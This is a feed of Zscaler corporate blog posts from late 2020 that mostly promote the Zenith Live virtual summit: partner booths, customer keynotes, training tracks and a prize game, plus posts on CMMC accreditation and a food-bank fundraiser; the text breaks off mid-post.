Research Blogs Feed Zscaler Blog — News and views from the leading voice in cloud security. en FireMon and Zscaler Highlight Access Policy Management at Zenith Live 2020 Zenith Live is happening next week, and while you're at this year's virtual summit, we hope you will take time to check out our sponsors’ booths in the Virtual Partner Hall. As a Zenith Live Gold Sponsor, FireMon will be there highlighting the combined FireMon and Zscaler solution and how it provides enterprises with better company-wide access policy management and visibility. Leveraging Zscaler’s API, FireMon applies real-time policy analysis to ensure effective enforcement and network segmentation is in place. Customers can visualize configuration, policy, and rule usage statistics across all network security enforcement points through a single pane of glass. This centralized management approach allows customers to validate policies against regulatory or corporate standards, analyze access across the network, and monitor change to pinpoint risks quickly. Zscaler and FireMon provide: Policy Management. Normalize and manage policies across firewalls, next-generation firewalls, and cloud environments from various vendors from a single pane of glass. Policy Validation. Validate policies against regulatory requirements or custom-defined policies. Access Analysis. Confirm Zscaler security controls enforce the desired enterprise-wide access, security, and compliance policies. Rule Base Compliance. Monitor and ensure security controls continuously maintain compliance with defined access and rule policies. Identify rule, access, and configuration compliance violations. Network Mapping. Automatically collect and build Zscaler Cloud Firewall data into a visual and interactive model that provides network abstraction of access paths end-to-end with access path analysis and network map visualization. Rule Review. Analyze firewall configurations to identify hidden, unused, shadowed, or overly permissive rules that provide more access than necessary. Change Tracking. Track changes to Zscaler Cloud Firewall rules for compliance or rule review analysis. Ensure changes are certified. Identify when a change occurred, who made the change, and whether it was expected, and determine if the difference created a negative impact. See how the Zscaler and FireMon integration works: Using FireMon, joint customers can visualize and manage Zscaler Advanced Cloud Firewall policies alongside traditional firewalls and other network security policy enforcement points. This simplifies migration and ensures continuous visibility, control, and compliance across hybrid network environments. Check out the video below, describing how the partnership between Zscaler and FireMon helps secure digital transformation. Register now for Zenith Live—a virtual and free event starting December 8, 2020. Visit FireMon’s booth to learn more or talk to a FireMon expert about integrating Zscaler and FireMon solutions for better, more secure digital transformation. Amit Raikar Go Beyond Limits in Zenith Live’s Virtual Game We’re looking forward to seeing you at Zenith Live 2020 Virtual Cloud Summit on December 8-10. At Zenith Live, you can join other IT leaders and pioneers creating real change in their organizations by leading the drive to a mobile, cloud-first future. The theme of Zscaler's third annual cloud conference is “Beyond Limits.” Take the opportunity to go beyond limits during the conference: Your mission is to blow out our conference-wide game and rack up tons of points on the Zenith Live leaderboard in our Virtual Lounge! You can help some important charities in the process. For each activity during the conference—attending a breakout session, visiting a partner booth, watching a CxO panel, participating in a Q&A lecture, etc.—you earn “mission” points. The highest point earners at the end of the conference will win a cool swag package!* First prize. $100/€100 Amazon voucher, a Zenith Live T-shirt, and Andy Greenberg’s book Sandworm. Second prize. $50/€50 Amazon voucher, a Zenith Live T-shirt, and Andy Greenberg’s book Sandworm. Third prize. A Zenith Live T-shirt and Andy Greenberg’s book Sandworm. You can find a list of activities and their associated mission point values in the Virtual Lounge once Zenith Live begins. Daily scores are tabulated on Zenith Live’s mission scoreboard. When you’re in the virtual lounge, don’t forget to take a picture and socialize it on Twitter using #ZenithLive. Play the Whack-a-Threat game as well! Both activities earn mission points towards winning the game! Part of Zenith Live’s beyond limits mission is giving back to the community. We encourage you to explore and support two charities during the conference: Global Food Banking Network. The Global FoodBanking Network (GFN) is an international non-profit organization that nourishes the world’s hungry through uniting and advancing food banks in more than 40 countries. Girls Who Code. Girls Who Code is an international non-profit organization working to close the gender gap in technology and change the image of what a programmer looks like and does. We hope you’ll donate to these worthwhile charities before, during, and after Zenith Live. Leaderboard prize winners also have the option of donating the value of their prize to one of the above charities. Good luck with the game! Go beyond limits and explore every corner of Zenith Live to get the maximum number of points. Check the leaderboard daily to see who is in the lead. This year’s summit features inspiring speakers and practical training for CxOs, IT execs, network architects, security managers, and business leaders who seek secure digital transformation beyond limits.  Register now. *Some conference attendees are not allowed to accept gifts from third parties. Please check with your organization as to their policies. David Avery What Does CMMC Accreditation Mean for Zscaler Customers and DoD Vendors? Those of us who work within the DoD community have spent many hours over the last few months discussing the Cybersecurity Maturity Model Certification (CMMC) and what it will mean for the defense community if, or when, it rolls out. All the discussion of permutations and possibilities is leading to some confusion regarding how or when to move forward. Let’s take a closer look at the CMMC, why it matters, and what it means for current and potential DoD vendors. Why CMMC? Led by the Office of the Under Secretary of Defense for Acquisition and Sustainment (OUSD A&S), the purpose of the CMMC is to provide formal accreditation for any organization within the defense industry base (DIB) that handles controlled unclassified information (CUI) or federal contract information (FCI). Of course, adhering to security requirements is not new for DoD vendors. These organizations are already required to comply with existing government regulations (such as the NIST SP 800-171 standard as well as other requirements under DFARS 252.204-7012). Under these provisions, individual organizations were responsible for their security standards, which DoD never reviewed or confirmed. However, DoD and its broader community recognize this self-assessment is no longer enough to protect government data. That’s partially due to the growing threat landscape facing federal agencies and their associated vendor communities. The Council of Economic Advisers (CEA) released a report in 2018 that said malicious cyberattacks were responsible for $50 billion to $100 billion in losses to the U.S. economy in 2016 alone. Katie Arrington, chief information security officer for DoD’s acquisition and sustainment office, also noted that cyber adversaries have successfully targeted DoD contractors who haven’t fully secured their networks. It’s no wonder the DoD is taking extra precautions around the government’s ability to secure the immense quantities of data it accumulates and shares with the DIB. Whether it’s a DoD contractor, corporate partner, or academia, anyone who touches that government data needs to be responsible for its security—to some degree. CMMC: An assurance program for the DIB In the way that FedRAMP provides security assurances for cloud computing, CMMC accreditation will provide security assurances for government data that these DIB organizations possess within their defined security boundaries. Despite the size of the impacted community and the amounts of data to protect, CMMC provides a straightforward approach. The DoD vendor community must meet controls around data. Many of these controls already exist under other rules and accreditations. The only difference is that the wording is specific to the DoD community and its relationship with the DIB. At this time, the CMMC Accreditation Body is figuring out how to facilitate reciprocity between other accreditation programs. In fact, to help provide clarity, they are developing a matrix to map the controls among different accreditations. It is in review now and should be published in the next few months. The big picture If security rules and accreditation exist, why add another one? It all comes down to the protection of the government's data in applicable scenarios. Since the days of the initial DARPANET, the DoD has been developing better ways to share sensitive government data with the DIB. Yet, there has never been any kind of body overseeing how these partners are securing that data on the government's behalf. Of course, it is in each contractor’s own best interest to protect the data or risk losing current (and any future) contracts. The same applies to reporting any data or security breaches. However, DoD vendors are not currently required to prove their security at the outset to win a contract. Due to the complexities of government contracting and acquisition, there is not the same level of competitiveness across all companies within the United States to compete for these contracts. That fact could possibly lead to accepting additional risks on contracts that should not be acceptable. CMMC addresses that. What DoD contractors need to know None of the above answers the big question: “How do we proceed today?” How do you choose who to partner with? How do you know that a solution you buy today will undoubtedly assist you in meeting CMMC accreditation in six months? More importantly, how do we choose a partner that will deliver on the intent of the policy even if some of the aspects of the policy change? One answer is to look for a partner that has proven to be 100-percent compliant—a partner such as Zscaler. Zscaler has achieved all major government and commercial certifications, authorizations, and reporting requirements, including FedRAMP (Moderate and High), ISO 27001, SOC 2, FIPS 140-2, CSA-STAR, ISO 27018, ISO 27701, CJIS, and more. With the support of our independent assessors, Schellman and Company, LLC, we have no doubt that we will achieve certification when CMMC is codified. As sometimes happens with these government initiatives, if CMMC morphs into something different, we will also garner that accreditation. We will do it because securing data is our business Zscaler products provide security on top of an organization's network environment and associated risks. If your company is working on behalf of the government and you’re concerned about how you will contractually meet the security of the government's data while you’re accessing it, or providing the security to prevent unauthorized access to it, then Zscaler is the partner you're looking for. At the same time, we can secure your environment. Because we're the security partner in the greater information assurance ecosystem, we can secure your corporate environment at the same time we secure the government data you have access to with the same capability. That means you’re not bound to build a network security stack for the government and then another one with a little looser security for your user base. Rather, partnering with a global leader in zero trust and SASE, Zscaler empowers the organization to transform its security architecture to a Zero Trust Exchange overlay of all aspects of the organization's IT environment. We offer, and always will, a natural transformational shift in how you're managing transport or network security. We fit that roadmap regardless of what the policy may be called, as our core competency is to deliver world-class security globally while improving user experience. Final thoughts on CMMC Everyone involved with government data needs to be held accountable for managing that data. CMMC acknowledges that the industry cannot self-assess anymore. We've had too much intellectual property leaked, and sensitive unclassified information exposed due to a lack of good cyber hygiene. CMMC will help fix that. One caution, though. As Katie Arrington has pointed out numerous times, many companies claim to offer accreditation, guidance, and even “pre-certified” vendor solutions. That is not the case. Beware of any organization that claims to be a CMMC governing body. The OSD’s official website only recognizes the CMMC Accreditation Body. The best advice for a DoD vendor is to turn to the official source for information and work with a partner who has a proven track record of achieving government accreditation. Patrick Perry At Zenith Live: Customer Voices Say Trust Zero Trust Zenith Live starts in just over a week, and attendees can look forward to two days full of ways organizations are accelerating secure digital transformation for the cloud- and mobile-first world. Each day starts out with main stage keynotes, including Zscaler customers discussing how they solved network and security transformation issues using zero trust and the Zscaler Zero Trust Exchange platform. Don’t miss these real-world solutions from enterprise leaders on how they addressed company-wide agility and resiliency in the face of new challenges and market changes. Making IT more resilient, responsive, and secure: Johnson Controls revolutionizes smart cities and global communities. Join this keynote to learn how Diane Schwarz (CIO) at Johnson Controls International is modernizing IT to align with its ambitious goals to revolutionize smart cities and global communities. Carl Erickson (CISO) and Maria Jose Lloret Crespo (CTO) join Diane to explain how they safely transformed IT to quickly handle unforeseen events without impacting business or the security of its employees or customers. This transformation allowed them to answer the call when large acquisitions doubled the company's size and during a global pandemic that required their essential services to continue uninterrupted. They were able to handle all of it in stride due to the foundations they had laid that brought about greater agility and uncompromising protections. The “Why” of Secure Digital Transformation: Takeda Pharmaceuticals Company uses Zero Trust. Join Mike Towers, CISO of Takeda Pharmaceuticals, Ltd., as he shares his successful roadmap for secure digital transformation. During this session, you'll get in-depth guidance on building a case for change across the organization based on business value. Brent Ball, Takeda's global head of intelligence, analytics, and response, will share a detailed account of how the team used security transformation to reimagine Takeda’s operations, resulting in reduced risk and a better patient, caregiver, and third-party partner experience. Keeping the World Employed Through Transformation – The Story of ManpowerGroup. What do you do when a global pandemic makes it more important than ever to keep the world employed? In this keynote, you’ll hear how Randy Herold, CISO at Manpower, convinced the business to support transformation and is using it to accelerate M&As and to simplify public cloud adoption. You'll also hear from Abdul Khan, VP of Global Infrastructure and Operations at Manpower, who describes how he was able to help define the IT vision, pioneer a transformation strategy, and shift away from legacy networks. When the business called on them, their teams had the Fortune 500 leader in workplace solutions—with its 28,000 users, 45,000 endpoints, and 2,500 offices—prepared when it mattered most. We hope that you can join us December 8-9 at Zenith Live and learn how our customers are using zero trust to accelerate secure digital transformation. You’ll even hear from an astronaut about what it takes to spend nearly a year in space. Registration is now open. David Avery Zenith Live 2020 Session Spotlight: “Defending the DoDIN, One of the World’s Largest Networks” Protecting one of the largest, most complex, and most-frequently attacked IT infrastructures in the world? It's just another workday for William Robinson, U.S. Army Chief Technology Officer G6. Robinson and team oversee the Department of Defense Information Network (DoDIN), which serves the entire U.S. Department of Defense (DoD), one of the largest federal organizations in the world. Federal government agencies aren't always renowned for progressive, forward-thinking approaches to cybersecurity. But Robinson's secure digital transformation strategy quickly dispels that notion, at least in his case. He is leading the Army’s digital transformation efforts to ensure secure connectivity across the Department of Defense. The DoD has multiple levels of service and multiple levels of leadership, all defending against the most complex attacks—cyber and "other"—in the world. For Robinson and the DoDIN, digital transformation meant a shift to the cloud, and away from costly, unscalable point products. But it was clearly the best strategy to modernize and maintain an IT infrastructure as unique and vast as the DoDIN. Robinson worked (and continues to work) with a diverse ecosystem of partners in industry, academia, and other government agencies to ensure DoD stays ahead of cyber threats. Ultimately, a zero trust approach was found to be the most effective for securing the DoD's globally-dispersed (very globally-dispersed) workforce. Robinson will share the U.S. DoD digital transformation story at Zenith Live 2020. He'll join me in a Fireside Chat along with Patrick Perry, the Zscaler Director of Emerging Technology for DoD/IC, himself a United States Armed Forces veteran of 22 years, working in IT Architecture and Integration with a number of organizations, including Special Operations Command. This year, every seat’s in the front row as Zenith Live 2020 goes online and free. But space is limited. Register now at Jose Padin Zenith Live 2020 Session Spotlight: “SSL Inspection is Critical: How to Overcome Legal and Privacy Objections” All that data coming into your enterprise? It’s encrypted. Well, nearly 90 percent of it is, at least according to Google. Most encryption serves a noble purpose: Users employ it to secure the data they send across the open internet. Unfortunately, so too do threat actors, who encrypt their destructive payloads to obscure them from traditional security inspection. The real problem is one of scale: Legacy hardware cannot easily scale to inspect all incoming and outgoing data traffic, especially when data traffic volume spikes. Some security approaches simply ignore that fact, others sample incoming secured data. Both approaches leave enterprises vulnerable. More and more hackers are taking advantage of the fact that many organizations simply can’t inspect all encrypted HTTPS traffic. Those organizations make attractive attack targets: In the last nine months, SSL/TLS-encrypted threat activity has increased 260 percent over last year. And in the last six months, the Zscaler ThreatLabZ security research team has seen ransomware attacks delivered inside encrypted traffic grow five-fold. (A recent Zscaler ThreatLabZ study analyzed threats hidden in encrypted traffic and looked deeper into sophisticated attack techniques). The cloud-based Zscaler Zero Trust Exchange offers comprehensive inspection of all SSL/TLS-encrypted data traffic, with no impact to performance. But that’s only a first step: Many organizations may still face obstacles—architectural, technological, or legal—implementing full inspection of encrypted data. Some organizations must delay adopting encryption-inspection due to GDPR-compliance or worker-council concerns. But such delays expose enterprises to risk, and not just because they’re not using the full power of their security solution(s). Zscaler is helping organizations protect their users, applications, and data assets with full SSL/TLS encryption inspection. Next month, join me and my colleagues Brad Moldenhauer and Nicolas Casimir (Zscaler CISOs for the Americas and EMEA regions, respectively) at Zenith Live 2020, where the three of us will present “SSL Inspection is Critical: How to Overcome Legal and Privacy Objections.” Our talk will focus on the risks posed by encrypted threats; the business, legal, privacy, and security implications of managing that risk; and how the Zscaler Zero Trust Exchange applies a scalable approach to SSL/TLS inspection. This year, every seat at Zenith Live is in the front row, as the event goes virtual: All sessions are available online and free. But space is limited, so register today at Kevin Schwarz Zenith Live: Training for the Next Generation of Cloud Leaders Do you feel that? It’s the excitement building around Zenith Live, the Zscaler Annual Cloud Summit, which is only a few weeks away! We’ve been preparing around the clock for this year’s all-virtual conference, and we’ll be bringing you incredible opportunities to hear from industry visionaries, join panel discussions with business leaders, connect with peers...and learn! In fact, the training this year includes a slew of two-hour essentials and masters classes with lab exercises. These courses are designed to help you tackle some of today’s toughest networking, cloud, and security challenges on the digital transformation journey. You can gain new skills or develop further those you already have. Not only that, but you’ll earn CPE credits. We can’t stress enough that the three training tracks—Networking, Security, and ZPA/Zero Trust—offer something for everyone. Below are just some of the sessions we’ll be offering at Zenith Live. You can access the full course list by visiting our agenda page. Registration is open, but space is limited and some sessions are already full, so get yourself registered and signed up for training while space is available. Networking Essentials Cloud Firewall with Z-tunnel 2.0: Explore securing all ports and protocols with Zscaler Cloud Firewall and Cloud IPS from the perspective of network and security operators as well as testing the end-user experience. Traffic Forwarding with SD-WAN: Learn how to enable branch network transformation for rapid deployment of integrated products from Zscaler SD-WAN technology partners. Networking Masters Zscaler Client Connector Deployment & User Authentication: Participate in hands-on lab exercises that explore options for the automated deployment and enrollment of Client Connector. User Experience Management with ZDX: Learn how ZDX provides visibility into the end-user device, network path, and SaaS/internet application performance for comprehensive user experience insights. Security Essentials Threat Protection with Cloud Sandbox and ZIA: Learn to configure and monitor malware and advanced threat protection, including Cloud Sandbox malicious active content protection. Endpoint Protection Integration: Learn how the Zscaler platform integrates with third-party endpoint protection solutions such as CrowdStrike Falcon to provide end-to-end protection from device to app. Security Masters Data Protection with DLP & EDM: Learn how Zscaler Cloud Data Loss Prevention with Exact Data Match (EDM) allows you to secure data in motion across any of your users’ network connections. Security Operations Workshop: Learn about Zscaler security layers and how to understand security logs, APIs, integrations, and threat hunting. ZPA/Zero Trust Essentials Getting ZPA Working: Learn best practices for securing remote access to private apps while delivering the best user experience possible in this hands-on session. ZPA Application Discovery and Basic Management: Learn to configure application discovery, convert the discovered applications to ZPA application segments, and build application access policies. ZPA/Zero Trust Masters ZPA Advanced Policy Control: Discover how advanced ZPA policy controls provide the granularity needed to provide application segmentation without network segmentation. ZPA Troubleshooting: Work with sample troubleshooting scenarios to gain experience with troubleshooting tools, the data they provide, and how to triage common ZPA misconfiguration issues. Remember, space is limited for each section, so register today. Join us at the Zenith of Digital Transformation Zenith Live 2020 will be unlike any other virtual conference. As the premier event dedicated to secure digital transformation, you’ll have the opportunity to connect with Zscaler leaders, customers, partners, and your peers, and we’ll even have an astronaut on hand to talk about what it really means to go beyond limits. Registration is live, so don’t wait to reserve your spot. Christopher Leach Keeping Food on the Table Amid COVID-19: How Second Harvest of Silicon Valley Gives Back A thriving economy in Silicon Valley has sent housing prices soaring, leaving many of our community members, including families, seniors, and veterans, struggling to put nutritious food on the table. Since 1974, Second Harvest of Silicon Valley has helped the most vulnerable members of our community through its mission of ensuring that anyone who needs a healthy meal can get one. Especially now, amid the COVID-19 pandemic, our communities need more help than ever. Second Harvest of Silicon Valley provides food to approximately 500,000 people every month—twice the amount they served prior to the pandemic. Many of those they serve are essential workers, including cooks, cashiers, health care workers, and teachers. For the second year, Zscaler was honored to be included in the Second Harvest of Silicon Valley’s 48-Hour Virtual Race to End Hunger. Participating companies enter a friendly competition to see who can raise the most money in two days with a company match. In this year’s race, Zscaler saw record participation from employees In 48 hours, Second Harvest and the participating companies raised more than $939,000, which will provide more than 1.8 million healthy meals to those in need in the Silicon Valley. This year, more than 86 percent of Zscaler employees contributed. As a company that values giving back to the community, we couldn’t be more proud—it speaks volumes about the people and giving culture at Zscaler. Second Harvest estimates that one in four people in Silicon Valley face food insecurity, which is defined as a household-level economic and social condition of limited or uncertain access to adequate food. One in 10 people in Silicon Valley receives food from Second Harvest. Please consider donating or volunteering to support your local community. Get inspired and read more about the impactful work Second Harvest of Silicon Valley is doing to benefit those in need. Greg Pappas The Zenith Live 2020 CXO Panels: Immediate, Engaging, and Open to All This post originally appeared on LinkedIn. In December, every seat at the premier global cloud summit will be in the front row. This year, Zenith Live 2020 goes virtual, with all sessions available online and for free. The online event will deliver an immediacy that brings business, networking, and security leaders into direct contact with IT leaders for engagement, learning, and an incredibly intimate conversation. This will be particularly true for the Zenith Live CXO Perspectives panels, a series of discussions with leaders from business, network architecture development, and cybersecurity detailing their insights, experience, and cloud journeys. CXO Sessions are tailored to function and are offered in all regions (Americas, Europe, and Asia-Pacific). Even better, the CXO Perspectives Panels are open to all attendees (but register now because space is limited). Below, a few highlights. For CIOs and Business Leaders Early investment in digital transformation set Essen, Germany-based logistics giant DB Schenker on a progressive path to secure digital transformation. But it was the COVID outbreak (and the rapid response to remote-work enablement demands) that solidified CIO/CDO Markus Sontheimer's commitment to the cloud (and to Zscaler). Sontheimer will share his story—including details of how DB Schenker pivoted thousands of employees to remote work in a matter of days—in conversation with Zscaler CIO and EVP of Emerging Technologies Patrick Foxhoven on December 9th at Zenith Live 2020 for the EMEA region. For CTOs and Network Architects John Maya is a believer in the maxim, "Never let a good crisis go to waste," but, in his words, "COVID has redefined what 'crisis' really means." The VP of Operational Excellence for Royal Caribbean Group led his organization's operational response to the recent pandemic, including shifting away from legacy networking technology to cloud-based remote access with Zscaler Private Access (ZPA). Hear more from Maya on December 8th when he speaks with Zscaler Senior Director of Transformation Strategy Pam Kubiatowski at Zenith Live 2020 for the Americas region. He'll share how he enabled tens of thousands of Royal Caribbean Group employees to work remotely in just two weeks, and how the Zscaler Zero Trust Exchange provides new levels of visibility into corporate data traffic. For CISOs and Security Professionals Fannie Mae CISO Chris Porter is tasked with securing users, assets, infrastructure, and data for the government-sponsored U.S. mortgage-loan financing organization. For Porter, the role of the CISO doesn't "end" with security. It starts there. He has overseen Fannie Mae's secure digital transformation, and has worked to make security an integral component of the organization's business fabric: IT decisions—even security ones—focus on customer and user experience. Porter will discuss Fannie Mae's journey to the cloud at Zenith Live 2020 in conversation with Zscaler President and CTO Amit Sinha. This year, the premier global cloud summit will be more intimate, personal, and engaging than ever. Join me and business, network, and security leaders like you December 8–10 (14–15 in Asia) for Zenith Live 2020. Space at the CXO Perspectives panels is limited, so sign up now at Kavitha Mariappan Don’t miss CrowdStrike at Zenith Live 2020 Zenith Live 2020 Virtual Cloud Summit on December 8-10 isn’t that far off. Join revolutionary IT leaders who are creating real change in their organizations by embracing secure digital transformation and driving a mobile- and cloud-first future. The theme of Zscaler's third annual cloud conference is “Beyond Limits.” The partnership between CrowdStrike and Zscaler takes the endpoint security and cloud application architecture beyond limits by enabling the rapid identification of threats discovered at the cloud edge, and seamlessly facilitating remediation across both the platforms. CrowdStrike is a Zenith Live Platinum sponsor and will host a booth at the Virtual Partner Hall during the summit. We asked CrowdStrike to quickly answer a few questions about CrowdStrike Falcon, Zscaler, and Zenith Live: What is it that CrowdStrike Falcon does to help enterprises realize digital transformation goals?CrowdStrike Falcon® architecture, with its single lightweight agent supporting a vast cloud repository of actionable threat data and intelligence, helps redefine security for the cloud era using an endpoint and workload protection platform. Leveraging cloud-scale artificial intelligence (AI) and powered by the proprietary CrowdStrike Threat Graph, the Falcon platform offers real-time protection and visibility to effectively stop breaches no matter where the endpoints are located—on or off the network. With CrowdStrike, customers can realize better protection, better performance, and immediate time-to-value during their digital transformation journey. How does the partnership between CrowdStrike and Zscaler contribute to an enterprise’s digital transformation journey?Traditional network security and endpoint protection solutions that sit on-premises are ineffective in today’s cloud-first and mobile world. Complex IT network security appliance stacks (physical or virtual) are cumbersome to deploy, manage, and maintain. Enterprises must transform this traditional security model to a cloud-native, zero trust architecture to combat increasingly sophisticated attacks and gain visibility into endpoints and cloud applications. Together, CrowdStrike and Zscaler modernize security protection by integrating endpoint and network security solutions, increasing end-to-end visibility, detection, and containment with automation. Threat data from the Zscaler Cloud Sandbox is correlated with CrowdStrike’s endpoint telemetry to quickly identify zero-day threats, analyze the affected endpoints, and enact rapid quarantine action. The integration of posture-driven, conditional access delivers zero trust access control from the endpoint to cloud applications without the need for Virtual Private Networks (VPNs). This ensures that only validated endpoints can access authorized apps and assets, reducing exposure to attacks and breaches. What presence will CrowdStrike have at the Zenith Live conference? CrowdStrike and Zscaler’s mutual customer, Cushman & Wakefield, will explain how cloud-native zero trust security enabled them to transform their endpoint security and cloud application access to meet the needs of a cloud- and mobile-first world—both in a pre-COVID and post-COVID time. Speakers from CrowdStrike and Zscaler will discuss current solutions, and preview an upcoming Zscaler integration with CrowdStrike’s endpoint security posture assessment that enables tighter enforcement of dynamic conditional access policies. This integration helps organizations embrace a Zero Trust Network Access (ZTNA) architecture. On December 8-10, 2020, Zenith Live will bring together innovators leading their organizations’ secure digital transformation. Don’t forget to check out CrowdStrike’s booth at the Zenith Live Partner Hall during the conference, and don’t miss their session Cushman & Wakefield Security Transformation: Unifying Endpoint and Cloud Security with CrowdStrike and Zscaler. This year’s summit features inspiring speakers and practical training for CxOs, IT execs, network architects, security managers, and business leaders who seek secure digital transformation beyond limits. Register today. Amit Raikar Zenith Live 2020 Speaker Profile: Hanna Hennig, Siemens CIO Hanna Hennig will speak on the main stage December 9 at Zenith Live 2020, the Zscaler Annual Cloud Summit. The pandemic has forced organizations to accelerate digital transformation: Enterprises that seize the moment to embrace a perimeter-less security model will be more agile, profitable, and competitive. That rings true for Siemens AG CIO Hannah Hennig, who joined the company right before COVID changed everything. "[It was a] very exciting time to be thrown into the 'cold water,'" noted Hennig, speaking with Zscaler CEO Jay Chaudhry last month at the Zscaler CXO Summit. Hennig had "to ensure our company was still productive" when COVID hit, and that meant enabling 300,000+ Siemens' employees to work from home. She looked to Zscaler—in particular, Zscaler Private Access (ZPA)—to provide scalable, secure remote connectivity for the Siemens workforce. Hennig had to accelerate ZPA rollout: "We moved over [from VPN to ZPA for 300K employees] in days. Not weeks. Days." Siemens' successful (and aggressive!) pivot to a work-from-anywhere (WFA) workforce represented the first time in company history such a dramatic IT change had been introduced so rapidly. But for Hennig, it had two additional impacts: It both provided perspective, but also raised expectations. Ultimately, the "better flexibility, better security, even better performance" Siemens now enjoys with Zscaler comes down to a very practical element of the Siemens transformation journey. " "The other part, it's all about people," concludes Hennig. "We IT folks we need to understand the technology, we need to pick the right technology, but we also need to ensure that those who we provide the technology and solutions for, that we are also taking them with us." Hear the rest of the story directly from Siemens CIO Hanna Hennig when she speaks on the main stage at Zenith Live 2020. This year, the world’s premier cloud summit goes virtual and free December 8–10. You’ll get the opportunity to engage with Hanna Hennig and IT leaders from Unilever, Sandvik, DB Schenker, Testco, and many more. Toph Whitmore Grit, Resilience, and Patience: Jody Davids’ IT Leadership Career It’s just a few weeks until December 8, when Zenith Live begins, and there is so much I’m looking forward to. In particular, I am thrilled to be moderating a Women in IT panel, where I’ll be joined by lT leaders in a discussion about how confidence, a growth mindset, and professional resilience can lead to a more diverse set of IT leaders. One of the women on the panel is Jody Davids, whom I’ve had the pleasure of presenting with before and whose remarkable journey is inspiring the next generation of IT leaders. Jody Davids started her IT career as a secretary. She earned a bachelor's degree at night and got interested in how IT functions in the enterprise. Her first programming job started after a colleague signed her up for entry-level programming training. “That’s how well thought out my IT career was,” she once told a group of rising IT executives. She has over 30 years of experience leading and developing technology initiatives at large organizations, including CIO roles at Cardinal Health, Best Buy, and Agrium, culminating in her position as senior vice president and global CIO at PepsiCo. When Davids retired from PepsiCo in October 2019, she managed an IT team of 3,000 responsible for delivering technology services to 260,000 employees. Early in her career, Jody joined Apple, where she worked on the Apple III with Steve Jobs. After that, she went to Nike, a change she described as significant: it gave her insight into two distinct and contrasting types of leaders. One (Steve Jobs) a visionary icon who galvanized his teams with bold ideas, a forceful personality, and a little intimidation; the other (Phil Knight) a quieter and less bombastic leader who leaned more often on the empathetic elements of management. The change opened up Davids to the realization that there are many different paths to successful leadership, and she could determine her course. Despite humorous asides about her start, Ms. Davids absolutely set an early goal of being a Fortune 200 company CIO. Reflecting on how to achieve this goal, she asked herself, “What do I have? What part of me is ready to be a CIO? What do I need to develop to truly become more viable as a candidate for a CIO opportunity?” She also set a distinct goal to become a board-level CIO. She is currently a member of Premier Inc. and is a board advisor to the nonprofit The Eyes of Freedom: Lima Company Memorial. Davids believes that the CIO is one of only a handful of executives who genuinely have an entire organization’s perspective. CIOs have the enterprise operational knowledge that translates to boardroom intelligence and the cybersecurity knowledge and familiarity that other board members don’t. There is a saying that has informed Jody Davids’ decisions throughout her career: “You don’t always get to choose what happens, but you DO get to choose how you respond to it.” With this maxim as her starting point, Davids crafted a self-management practice that includes three pillars: resilience, grit, and patience. When the three pillars actively work together, they support whatever purpose you choose to pursue. Grit, resilience, and patience help future leaders navigate their course in seeking more challenging opportunities—especially when facing the inevitable setbacks. There have been many lessons in Ms. Davids’ career, both from her successes and her failures. These lessons have ultimately made her a better leader. I am honored to be joining Jody Davids and other leaders in the Women in IT panel session, and I hope you’ll be there. Registration is open now. Sign up today and add this session to your agenda. You don’t want to miss it! Kavitha Mariappan Secure Digital Transformation is a Winning Strategy Earlier this month, when I began my journey as chief marketing officer at Zscaler, I knew that I was becoming part of a visionary organization. Zscaler’s approach to securing the enterprise in the era of cloud and mobility was a radical departure from the ways it had been done in the past. In the 12 years since the company was founded, Zscaler has proven that its cloud-native security architecture is the right approach, providing an extensible platform that solves customers’ security challenges and enables them to achieve their digital transformation goals. So, it does not surprise me that Zscaler has been named in this year’s “Technology Fast 500,” an award program sponsored by Deloitte that recognizes 500 of the fastest-growing and most innovative companies in North America. Though I’ve only been here two weeks myself, I’ve known Jay Chaudhry, the company’s founder and CEO, for many years, and I’ve had the opportunity to meet with dozens of the people whose work is directly responsible for Zscaler’s growth, its customer focus, and its nonstop innovation. It’s been a thrill, and it’s just getting started. This year, it’s been especially gratifying to see how Zscaler has been helping customers through what has arguably been the most challenging time in memory. Of course, the crisis isn’t over, and its full magnitude, particularly its human toll, cannot be known. But I do know that enabling companies to continue operations with their employees working safely and remotely has been critical—not only to those companies, but to economies, communities, and, most of all, to families. Zscaler has been instrumental in this effort, providing secure application access for all the employees in thousands of organizations around the world, often as they connect over unsecured networks and use unmanaged devices. It has been a testament to the power and scale of the cloud, and to the importance of secure digital transformation for fueling the flexibility and resiliency organizations need. If you’d like to see what all this means to real-world organizations, join me at Zenith Live, the Zscaler Annual Cloud Summit, which kicks off December 8. It’s your opportunity to hear from leaders who have successfully navigated the secure digital journey and learn from experts on SASE, data protection, DevSecOps, CASB, zero trust, CSPM, and so much more. This year’s virtual event will bring together thousands of IT professionals at all levels, and it will offer something of value for everyone who attends. I encourage you to register and create your agenda. In addition to dozens of technical sessions, you can join in expert-led training, inspiring keynotes, “birds of a feather” panels, live demos and Q&A, and you can even hear from an astronaut. I can’t wait for the virtual summit to begin, and I hope to see you there! Chris Kozup Don’t Miss Silver Peak at Zenith Live 2020 We’re looking forward to seeing you at Zenith Live 2020 Virtual Cloud Summit on December 8-10. At Zenith Live, you can join other IT leaders and pioneers creating real change in their organizations by leading the drive to a mobile, cloud-first future. The theme of Zscaler's third annual cloud conference is “Beyond Limits.” The partnership between Silver Peak and Zscaler takes the secure SD-WAN solution beyond limits by enabling cloud-delivered secure access to all applications everywhere. Silver Peak is a Zenith Live Platinum sponsor and will be hosting a booth at the Partner Hall during the summit. We asked Silver Peak to quickly answer a few questions about Silver Peak, Zscaler, and Zenith Live: What is it that Silver Peak does to help enterprises realize digital transformation goals? The Silver Peak Unity EdgeConnect SD-WAN edge platform enables enterprises to transform their WAN and security architectures by providing a thin edge with automated orchestration to cloud-delivered security services like Zscaler Internet Access (ZIA). Our Unity Orchestrator provides centralized WAN management in the cloud that is simple to deploy and agile in adapting to business needs. EdgeConnect is designed to deliver the highest multiplier from cloud and digital transformation investments while providing the highest quality of experience for application users. How does the partnership between Silver Peak and Zscaler contribute to an enterprise’s secure digital transformation journey? The Silver Peak EdgeConnect SD-WAN edge platform’s integration with the Zscaler Zero-trust Exchange allows enterprises to architect and deliver a secure access service edge (SASE) that assures users always have a fast, secure, and uninterrupted connection to business-critical applications. Branch office local internet breakouts are provisioned and secured in minutes, providing optimal performance to cloud applications and secure SD-WAN connectivity that automatically adapts to changing business requirements. For IT, that means lower costs and simplified operations. For the business, it means vastly increased productivity for end-users and uniform security enforcement for all branch locations across the enterprise. What presence will Silver Peak have at the Zenith Live conference? Cushman & Wakefield, a premier real estate firm with 400 locations in 60 countries, is a joint Silver Peak and Zscaler customer. In our Zenith 